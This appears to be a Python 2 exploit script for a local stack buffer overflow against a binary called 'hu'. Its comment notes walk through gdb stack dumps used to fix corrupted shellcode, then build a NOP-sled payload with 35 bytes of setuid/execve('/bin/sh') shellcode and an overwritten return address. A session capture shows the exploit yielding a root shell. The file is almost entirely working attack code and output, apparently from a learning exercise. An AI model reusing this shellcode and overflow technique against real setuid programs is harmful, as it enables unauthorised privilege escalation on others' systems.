#!/usr/bin/env python
"""
Ok so it seems i made a mistake in my original 
notes. sorry ;> 
 
tip) check the stack to make sure your shellcode 
     is not being corrupted.
ex:
 
(gdb) x/10x $esp - 47
0xbffff591:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff5a1:	0x90909090	0x90909090	0xdb31c031	0xd231c931
0xbffff5b1:	0x80cd46b0	0x2f2f6851
(gdb) 
0xbffff5b9:	0x2f686873	0x006e6962	0x2f000000	0x2f6e6962
0xbffff5c9:	0x0068732f	0x00000000	0xf0bffff7	0x48bffff5
0xbffff5d9:	0x75bffff6	0x70b7e8a7
(gdb) quit
 
we see our shellcode starting at 0xbffff5a1 going through 
the addresses we see it gets corrupted for some reason at 0xbffff5b9
null bytes -> fail.
 
Solution:
Eip resides at buffer = 1032 exactly so your buffer has to be 1028bytes
not 1032. since you use those extra 4 bytes as the eip address..
 
anyway for this bug i just split the buffer up like so
NOPS -> 428 bytes
SHELLCODE -> 35 bytes
NOPS -> 565 bytes
RET -> 4 bytes
 
>>> 428 + 35 + 565 +4
1032
 
(gdb) x/10x $esp -625
0xbffff35f:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff36f:	0x90909090	0x31c03190	0x31c931db	0xcd46b0d2
0xbffff37f:	0x2f685180	0x6868732f
(gdb) quit
 
as you can see our shellcode is not corrupted this time as it was last time :D
---
 
root@user-laptop:/home/user# nano bleh.py
root@user-laptop:/home/user# python bleh.py
# id
uid=0(root) gid=0(root) groups=0(root)
# exit
"""
 
import os
import struct
 
#shellcode len is 35
shellcode = (
 "\x31\xc0\x31\xdb\x31\xc9"
 "\x31\xd2\xb0\x46\xcd\x80"
 "\x51\x68\x2f\x2f\x73\x68"
 "\x68\x2f\x62\x69\x6e\x89"
 "\xe3\x51\x53\x89\xe1\x31"
 "\xc0\xb0\x0b\xcd\x80")
 
#EIP OVERWRITE IS AT 1032
 
lols  = "\x90"*428
lols += shellcode
lols += "\x90"*565
lols += struct.pack('<L',0xbffff35f)
 
print os.system("./hu %s"%lols)